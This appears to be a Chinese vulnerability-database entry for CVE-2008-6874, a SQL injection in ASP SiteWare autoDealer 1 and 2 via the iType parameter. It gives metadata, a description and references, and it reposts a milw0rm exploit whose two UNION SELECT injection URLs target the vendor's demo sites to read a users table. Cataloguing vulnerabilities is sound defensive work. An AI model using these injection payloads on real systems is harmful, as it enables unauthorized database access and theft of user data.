https://www.exploit-db.com/exploits/7463
https://www.securityfocus.com/bid/80675
https://cxsecurity.com/issue/WLB-2009070049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-352
ASP SiteWare autoDealer 多个SQL注入漏洞






漏洞ID | 1117027 | 漏洞类型 | SQL注入 |
发布时间 | 2008-12-14 | 更新时间 | 2009-07-24 |
![]() |
CVE-2008-6874 | ![]() |
CNNVD-200907-352 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
ASPSiteWareautoDealer1和2中存在多个SQL注入漏洞。远程攻击者可以借助(1)Auto1/type.asp和(2)auto2/type.asp中的iType参数执行任意的SQL命令。
|漏洞EXP
###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################
#Found By : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script : Automotive Dealer V1/V2
#download : null
#Demo : http://www.aspsiteware.com/Auto1/
http://www.aspsiteware.com/auto2/auto2/
###########################################################################
#Exploits :
--=[SQL INJECTION]=--
http://www.aspsiteware.com/Auto1/type.asp?iType=4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users#
http://www.aspsiteware.com/auto2/auto2/type.asp?iType=4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users#
#Greetz For CrimeIRC NetWork [ IRC.CrimeIRC.Net ] Syst3m UnkOwn and all Staff
###########################################################################
# milw0rm.com [2008-12-14]
|受影响的产品
Aspsiteware Autodealer 2.0
Aspsiteware Autodealer 1.0
|参考资料
来源:XF
名称:autodealer-type-sql-injection(47365)
链接:http://xforce.iss.net/xforce/xfdb/47365
来源:BID
名称:32812
链接:http://www.securityfocus.com/bid/32812
来源:MILW0RM
名称:7463
链接:http://www.milw0rm.com/exploits/7463
来源:SECUNIA
名称:23572
链接:http://secunia.com/advisories/23572
检索漏洞
开始时间
结束时间